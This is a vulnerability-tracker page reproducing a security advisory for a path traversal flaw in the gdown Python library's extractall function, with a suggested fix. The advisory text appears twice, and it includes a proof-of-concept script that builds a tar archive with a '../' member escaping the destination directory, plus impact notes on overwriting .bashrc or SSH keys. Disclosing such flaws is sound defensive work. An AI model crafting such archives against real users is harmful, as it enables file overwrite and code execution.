Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
6.5
gdown: Malicious Archives Can Overwrite Files Outside Destination Directory
GHSA-76hw-p97h-883f
Summary
The gdown library can extract files from archives in a way that allows malicious files to be written outside the intended destination directory, potentially leading to sensitive data being overwritten or compromised. This is a security risk because it could allow an attacker to take control of your system. To protect yourself, make sure to update to the latest version of gdown or use an alternative library for extracting archives.
What to do
- Update gdown to version 5.2.2.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| pip | – | gdown |
<= 5.2.1 Fix: upgrade to 5.2.2
|
Original title
gdown Affected by Arbitrary File Write via Path Traversal in gdown.extractall
Original description
### Summary
The gdown library (tested on v5.2.1) is vulnerable to a Path Traversal attack within its extractall functionality. When extracting a maliciously crafted ZIP or TAR archive, the library fails to sanitize or validate the filenames of the archive members. This allow files to be written outside the intended destination directory, potentially leading to arbitrary file overwrite and Remote Code Execution (RCE).
### Details
The vulnerability exists in `gdown/extractall.py` within the `extractall()` function. The function takes an archive path and a destination directory (`to`), then calls the underlying `extractall()` method of Python's `tarfile` or `zipfile` modules without validating whether the archive members stay within the `to` boundary.
Vulnerable Code:
```
# gdown/extractall.py
def extractall(path, to=None):
# ... (omitted) ...
with opener(path, mode) as f:
f.extractall(path=to) # Vulnerable: No path validation or filters`
```
Even on modern Python versions (3.12+), if the `filter` parameter is not explicitly set or if the library's wrapper logic bypasses modern protections, path traversal remains possible as demonstrated in the PoC.
### PoC
## Steps to Reproduce
1. Create the Malicious Archive (`poc.py`):
```
import tarfile
import io
import os
# Create a target directory
os.makedirs("./safe_target/subfolder", exist_ok=True)
# Generate a TAR file containing a member with path traversal
with tarfile.open("evil.tar", "w") as tar:
# Target: escape the subfolder and write to the parent 'safe_target'
payload = tarfile.TarInfo(name="../escape.txt")
content = b"Path Traversal Success!"
payload.size = len(content)
tar.addfile(payload, io.BytesIO(content))
print("[+] evil.tar created.")`
```
1. Execute the Vulnerable Function:
```
`python3 -c "from gdown import extractall; extractall('evil.tar', to='./safe_target/subfolder')"`
```
1. Verify the Escape:
```
ls -l ./safe_target/escape.txt
# Output: -rw-r--r-- 1 user user 23 Mar 15 2026 ./safe_target/escape.txt`
```
### Impact
An attacker can provide a specially crafted archive that, when extracted via `gdown`, overwrites critical files on the victim's system.
- Arbitrary File Overwrite: Overwriting `.bashrc`, `.ssh/authorized_keys`, or configuration files.
- Remote Code Execution (RCE): By overwriting executable scripts or Python modules within a virtual environment.
### Recommended Mitigation
mplement path validation to ensure that all extracted files are contained within the target directory.
**Suggested Fix:**
```
import os
def is_within_directory(directory, target):
abs_directory = os.path.abspath(directory)
abs_target = os.path.abspath(target)
prefix = os.path.commonpath([abs_directory])
return os.path.commonpath([abs_directory, abs_target]) == prefix
# Inside [extractall.py](http://extractall.py/)
with opener(path, mode) as f:
if isinstance(f, tarfile.TarFile):
for member in f.getmembers():
member_path = os.path.join(to, [member.name](http://member.name/))
if not is_within_directory(to, member_path):
raise Exception("Attempted Path Traversal in Tar File")
f.extractall(path=to)
```
The gdown library (tested on v5.2.1) is vulnerable to a Path Traversal attack within its extractall functionality. When extracting a maliciously crafted ZIP or TAR archive, the library fails to sanitize or validate the filenames of the archive members. This allow files to be written outside the intended destination directory, potentially leading to arbitrary file overwrite and Remote Code Execution (RCE).
### Details
The vulnerability exists in `gdown/extractall.py` within the `extractall()` function. The function takes an archive path and a destination directory (`to`), then calls the underlying `extractall()` method of Python's `tarfile` or `zipfile` modules without validating whether the archive members stay within the `to` boundary.
Vulnerable Code:
```
# gdown/extractall.py
def extractall(path, to=None):
# ... (omitted) ...
with opener(path, mode) as f:
f.extractall(path=to) # Vulnerable: No path validation or filters`
```
Even on modern Python versions (3.12+), if the `filter` parameter is not explicitly set or if the library's wrapper logic bypasses modern protections, path traversal remains possible as demonstrated in the PoC.
### PoC
## Steps to Reproduce
1. Create the Malicious Archive (`poc.py`):
```
import tarfile
import io
import os
# Create a target directory
os.makedirs("./safe_target/subfolder", exist_ok=True)
# Generate a TAR file containing a member with path traversal
with tarfile.open("evil.tar", "w") as tar:
# Target: escape the subfolder and write to the parent 'safe_target'
payload = tarfile.TarInfo(name="../escape.txt")
content = b"Path Traversal Success!"
payload.size = len(content)
tar.addfile(payload, io.BytesIO(content))
print("[+] evil.tar created.")`
```
1. Execute the Vulnerable Function:
```
`python3 -c "from gdown import extractall; extractall('evil.tar', to='./safe_target/subfolder')"`
```
1. Verify the Escape:
```
ls -l ./safe_target/escape.txt
# Output: -rw-r--r-- 1 user user 23 Mar 15 2026 ./safe_target/escape.txt`
```
### Impact
An attacker can provide a specially crafted archive that, when extracted via `gdown`, overwrites critical files on the victim's system.
- Arbitrary File Overwrite: Overwriting `.bashrc`, `.ssh/authorized_keys`, or configuration files.
- Remote Code Execution (RCE): By overwriting executable scripts or Python modules within a virtual environment.
### Recommended Mitigation
mplement path validation to ensure that all extracted files are contained within the target directory.
**Suggested Fix:**
```
import os
def is_within_directory(directory, target):
abs_directory = os.path.abspath(directory)
abs_target = os.path.abspath(target)
prefix = os.path.commonpath([abs_directory])
return os.path.commonpath([abs_directory, abs_target]) == prefix
# Inside [extractall.py](http://extractall.py/)
with opener(path, mode) as f:
if isinstance(f, tarfile.TarFile):
for member in f.getmembers():
member_path = os.path.join(to, [member.name](http://member.name/))
if not is_within_directory(to, member_path):
raise Exception("Attempted Path Traversal in Tar File")
f.extractall(path=to)
```
ghsa CVSS3.1
6.5
Vulnerability type
CWE-22
Path Traversal
Published: 14 Apr 2026 · Updated: 14 Apr 2026 · First seen: 14 Apr 2026